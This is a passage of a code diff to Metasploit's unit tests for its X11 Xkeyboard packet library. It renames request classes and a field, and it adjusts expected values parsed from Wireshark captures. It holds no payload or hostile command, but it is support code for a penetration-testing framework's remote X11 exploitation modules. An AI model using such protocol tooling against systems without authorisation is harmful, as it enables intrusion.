+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapRequest.read(key_map_request)
expect(request.opcode).to eq(44)
end
end
@@ -435,7 +436,7 @@
describe 'creates new keyboard notify request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.read(keyboard_select_events_new_keyboard_notify)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.read(keyboard_select_events_new_keyboard_notify)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(1)
expect(request.request_length).to eq(5)
@@ -444,7 +445,7 @@
expect(request.affect_new_keyboard_key_codes).to eq(1)
expect(request.affect_new_keyboard_device_id).to eq(1)
# build packet and ensure it matches
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.new(
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.new(
xkeyboard_id: 136,
extension_minor: 1,
device_spec: 3,
@@ -461,7 +462,7 @@
describe 'creates map notify request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.read(keyboard_select_events_map_notify)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.read(keyboard_select_events_map_notify)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(1)
expect(request.request_length).to eq(4)
@@ -470,7 +471,7 @@
expect(request.map_key_types).to eq(1)
expect(request.map_key_syms).to eq(1)
expect(request.map_modifier_map).to eq(1)
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.new(
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.new(
xkeyboard_id: 136,
extension_minor: 1,
device_spec: 3,
@@ -488,7 +489,7 @@
describe 'creates bell request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::BELLREQUEST.read(set_bell)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11BellRequest.read(set_bell)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(3)
expect(request.request_length).to eq(7)
@@ -497,17 +498,17 @@
expect(request.bell_id).to eq(1024)
expect(request.percent).to eq(50)
expect(request.force_sound).to eq(0)
- expect(request.event_only).to eq(0)
+ expect(request.sound_only).to eq(0)
expect(request.pitch).to eq(0)
expect(request.duration).to eq(0)
expect(request.window).to eq(0)
- expect(request.name).to eq(816)
+ expect(request.name).to eq(814)
- request = Msf::Exploit::Remote::X11::Xkeyboard::BELLREQUEST.new(
- xkeyboard_id: 136,
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11BellRequest.new(
+ xkeyboard_id: 136
)
expect(request.to_binary_s).to eq(set_bell)
end
end
end
-end
\ No newline at end of file
+end